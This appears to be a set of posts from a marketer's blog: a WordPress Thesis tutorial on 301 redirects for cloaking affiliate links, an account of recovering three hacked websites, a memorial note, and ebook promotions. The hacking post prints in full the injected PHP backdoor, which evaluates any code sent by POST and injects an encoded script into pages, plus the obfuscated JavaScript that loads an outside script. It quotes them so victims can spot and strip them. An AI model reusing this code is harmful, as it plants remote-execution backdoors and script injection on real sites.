Note: This post is applicable only to Thesis 1.7, not 1.5.1. When I was using Thesis 1.5.1, there was no such feature.

If you are not using Thesis theme (I ask you to seriously consider using it) for your blog, I will let you know of a plugin which does exactly this in a minute.

But first let’s talk about how to create a 301 redirect in Thesis 1.7.

301 Redirect is the best way to redirect any web page to another link (it could be internal or external link) because it is SEO friendly and you won’t be penalized by search engines for doing this. I usually use this for cloaking my ugly, long, and non-memorable affiliate links.

Follow these steps to create a 301 redirect page for Thesis users:

• Login to Wordpress Dashboard.
• Create a new page: Pages > Add New (or Posts > Add New). I prefer creating new pages.
• Enter the title of the page. This will become the URL of this new page. Make sure this URL is what you want by checking the Permalink. To change/rename, click Edit and then Save.
• Goto field 301 Redirect for this Page’s URL (scroll down a bit), enter URL of the destination page – the page you want this new page to redirect to. In this case, it can be your affiliate link, for example.
  Click Publish.

Easy peasy!

Now you can test it by entering the URL of the new page in the browser, and if it works properly, it will send you to the destination page – the URL you just entered in 301 Redirect for this Page’s URL field.

I used to create PHP files just to cloak my links. Then I used FTP software to upload the files to my web server. As you can see, it is a very troublesome process. But with Thesis, you can do this in a flash. No FTP is required.

Video Tutorial

Watch this video if you are STILL not sure how to do it. Hope the tutorial video can help:

For Non-Thesis Users

Here is what I promised you at the beginning of this article.

If you are not using Thesis theme, you can still configure 301 Redirect in WP by using a plugin. Try this: 301 Redirect Plugin for Wordpress. I have not tried it myself. But judging from the positive feedback, I believe the plugin works as promised. Why not you give it a try?

About two weeks ago, my websites were hacked. Not one, not two but three! If you face the same problem, this post might be useful to you as I outline the steps I have taken to overcome this problem and prevent it from happening.

SYMPTOMS

Your site is down with error:

Parse error: syntax error, unexpected T_VARIABLE in /home/hosting/public_html/index.php on line 1

Upon checking, most of main PHP, HTML and JavaScript files are altered. The following lines are appended in the top section of PHP pages:

<?php if(!function_exists(’tmp_lkojfghx’)){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined(’TMP_XHGFJOKL’))define(’TMP_XHGFJOKL’,base64_decode(’PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NUUHNTc2NyU3NpZE5wdE5KbiUyMGNNN3NkNktyY1RQJTNEJTJGTkpuJTJGOWNNNzRUUCUyRTI0N1RQJTJFMiUyRTFOSm45Y003NSUyRmNNN2pxdWVkTnJTc3klMkVjTTdqc0hZJTNFJTNDJTJGU3NzVFBjdXZqcmlwdXZqdFNzJTNFJykucmVwbGFjZSgvVFB8TkpufEhZfHV2anxkTnxTc3xkNkt8Y003L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg==’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all(’#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(”\n”,$v))>5){$e=preg_match(’#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(’#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(’#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(’#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);if(stristr($s,’<body’))$s=preg_replace(’#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(’tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(’tmp_lkojfghx2′))!=’tmp_lkojfghx2′)$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

The following code is appended at the bottom of HTML and JS (Javascript) pages:

<!–
document.write(unescape(’%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9cM75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E’).replace(/TP|NJn|HY|uvj|dN|Ss|d6K|cM7/g,”"));
–>

If you look closely, the files that have been hacked/changed carry the same timestamp (same date and time.) I believe the hackers use a program to make the changes.

POSSIBLE CAUSES

(NOTE: It was later confirmed that FTP communication was the cause as I tried updating a site using Filezilla and sure enough the site was hacked again the next day. The other two sites that were updated with online FTP are intact.)

I search on the Internet and found that many people have experienced the same problem but no solution found.

SOLUTIONS

Step 1:

There are two possible causes. Either your web server or your computer is hacked. Before you do anything, use Lavasoft (IMPORTANT: For anti-virus, Do NOT use AVG Free as it caused another problem – inability to browse the Net – use Avira instead) or Spybot S&D (free) to detect and remove any possible spyware from your computer. You may want to scan your computer on a regular basis from now on.

(UPDATE: Yesterday, I used Malwarebytes.org to scan and remove some extra spyware which went undetected by Spybot and Avira. After the scan, I used Filezilla to upload some files to a website. I found out that the site works fine until now. CONCLUSION: Malwarebytes found the problem and fixed it better than Avira and Spybot and Lavasoft. Use this in the first place.)

Step 2:

Make sure you change your FTP passwords in cPanel first before anything else. To be sure I use online FTP instead of Filezilla to edit/upload/rename files. I don’t want my new passwords to be stolen via FTP communications.

NOTE: There’s a daily limit on transfer volume when you use Net2FTP. However, you can install net2ftp on your server.

Then take one of the steps below:

Option One: Restore from Backup

Depending on your webhost, you can either do a restore of your website yourself or you have to ask the Support team to do it for you. In this step, you want to revert your website to the day before the site is hacked.

Option Two: Do It Yourself

If you don’t have a backup from cPanel or webhost, you have no choice but to do this. This is the most time consuming one. By using a web based FTP client, upload all clean HTML and PHP pages (without the funny codes as shown above) from your own backup on your PC to your server. Of course, provided you have a mirror copy of your web pages.

If you don’t, do this: Edit the affected files directly using Net2FTP.com online by removing the extra codes.

I still find that using Net2FTP to download files to desktop and edit them with Dreamweaver, and then upload back to server using Net2FTP is faster.

For MySQL databases, I am not sure if I need to make any changes to rectify this problem. It seems that it’s not affected.

Try NOT to use Filezilla to avoid passwords being stolen again by hackers.

When you take these steps, you will get your website up and running again.

Preventive Measures

Scan your computer regularly using Spybot or Lavasoft (For anti-virus, do not use AVG Free, use Avira instead). Install firewall to protect your computer from being attacked by spyware or virus.

(UPDATE: Malwarebytes.org is the best for this problem.)

Backup your website on a regular basis using cPanel. Do backup as and when you have made changes. You can also use Wordpress plugin to automate the backup process. When your site is hacked, backups come in very handy. You will be very glad that you did.

There you go. It’s has been a great experience to me as it has never crossed my mind that my sites would be hacked.

As my routine today, the first thing in the morning, I checked my emails like normal. I couldn’t believe my eyes when I read about the passing of Gary Halbert.

I quickly read other mails from Gary’s fellow marketer friends. Again, they confirmed the sad news.

Gary passed away in sleep on Sunday night, according to John Calrton.

If you don’t know Gary, he’s the world’s one of the best direct marketers.

Even though I have not met Gary in person but I love his work. Visit his website while you can, I’m not sure how long it will be there.

The news is so sudden and I still thought that Gary was okay as he just posted his newsletter April 3rd.

The news makes me think that life is short. The best bet is to live your life to the fullest. Do what matters most to you, what you enjoy. Don’t neglect your loved ones until it’s too late.

Rest in peace, Gary.

Get an idea a day delivered to your inbox.

Click “Subscribe” and enter your name and email.

You can view the archive – thousands of interesting ideas.

You can also submit an idea if you have one.

Great tool. You might find some ideas that you can turn into wealth there.

Have fun,

Abel Cheng

P.S. – I’d like to hear your comment. Post it on the blog.

I didn’t believe it when I first read it.

MYSS! used to worth $29.95. But now you can get it free.

What the heck is MYSS! anyway?

It stands for Make Your Site Sell! The book is full of practical tips on how to start a business online from scratch.

It’s one of the books that I bought when I first started. It helped me so much in creating my first site. Trust me, it’s a gem and it’s so good that the book was called…

“The BIBLE Of Selling On The Net”

Seven volumes, over 1,500 pages…

Here’s everything that’s in the MYSS! 2002 volumes…

Product — how to develop and position products for the Web.

Make Your Store Sell! — the new volume, specifically about multi-product online stores.

Site-Selling — how to make a site that convinces visitors to buy.

Traffic-Building — how to attract targeted traffic to your site.

Despite that it’s free now, MYSS! remains a great read, full of useful, evergreen ideas and information, especially if you are trying to sell a product.

Wait no more, grab it while it’s still free here.

Have fun,

Abel Cheng

P.S. Secret: The author is one of my “carefully selected” marketing icons

P.P.S. Don’t just download it and chuck it aside. Read it right after you download it. If you don’t, I bet you’ll never read it. And you know what, you’ll be missing out many powerful tips.